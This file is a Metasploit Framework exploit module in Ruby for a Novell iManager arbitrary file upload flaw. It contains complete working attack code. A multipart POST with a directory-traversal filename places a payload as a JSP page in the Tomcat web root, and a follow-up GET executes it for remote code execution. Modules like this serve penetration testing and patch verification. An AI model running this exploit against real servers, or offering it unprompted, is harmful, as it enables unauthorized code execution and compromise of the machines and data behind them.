## # $Id: novell_imanager_upload.rb 10726 2010-10-18 07:05:22Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell iManager getMultiPartParameters Arbitrary File Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability which allows remote attackers to upload and execute arbitrary code. PortalModuleInstallManager }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10726 $', 'Platform' => [ 'win' ], 'Privileged' => true, 'References' => [ #[ 'CVE', '2010-??' ], [ 'OSVDB', '68320'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-190/' ], [ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2' ], ], 'Targets' => [ [ 'Universal Windows Target', { 'Arch' => ARCH_JAVA, 'Payload' => { 'DisableNops' => true, }, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 01 2010' )) register_options( [ Opt::RPORT(8080) ], self.class ) end def exploit page = Rex::Text.rand_text_alpha_upper(8) + ".jsp" fname = '../../../../../../../Progra~1/Novell/Tomcat/webapps/ROOT/' fname << page dbl = Rex::MIME::Message.new dbl.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"MODULE_FILE\"; filename=\"#{fname}\"") data = dbl.to_s # For some unknown reason, the service is unhappy with an extra EOL. data.strip! print_status("Uploading the payload via a POST request...") res = send_request_cgi( { 'uri' => '/nps/servlet/modulemanager', 'version' => '1.1', 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{dbl.bound}", 'data' => data, }, 5) if ( res and res.code == 200 and res.message =~ /OK/ ) print_status("Sending our second request to '#{page}'...") data = send_request_raw({ 'uri' => '/' + page, 'method' => 'GET', 'version' => '1.0', }, 5) handler else raise RuntimeError, 'POST failed' end end end